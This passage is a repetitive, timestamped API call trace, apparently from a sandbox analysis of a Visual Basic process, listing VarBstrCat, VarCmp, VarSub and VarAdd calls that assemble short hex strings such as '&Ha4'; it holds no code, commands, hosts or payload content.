pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.657] VarBstrCat (in: bstrLeft="&Ha", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.657] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.657] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.657] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.657] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.657] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.657] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.657] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.657] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.657] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.657] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.657] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.657] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.657] VarBstrCat (in: bstrLeft="&Ha", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.662] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.662] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.662] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.662] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.662] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.662] VarBstrCat (in: bstrLeft="&Ha", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.663] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.663] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.663] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.663] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.663] VarBstrCat (in: bstrLeft="&Ha", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.663] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.663] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.663] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.663] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.663] VarBstrCat (in: bstrLeft="&Ha", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.663] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.664] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.664] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.664] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.664] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.664] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.664] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.664] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.664] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.665] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.666] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.666] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.666] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.666] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.666] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.666] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.666] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.666] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.666] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.666] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.666] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.666] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.667] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.669] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.670] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.671] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.672] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.673] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.673] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.673] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.673] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.673] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.673] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.673] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.673] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.673] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.687] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.687] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.687] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.687] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.687] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.688] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.688] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.688] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.688] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.690] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.690] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.690] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.690] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.690] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.690] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.690] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.690] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.691] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.692] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.693] VarCmp 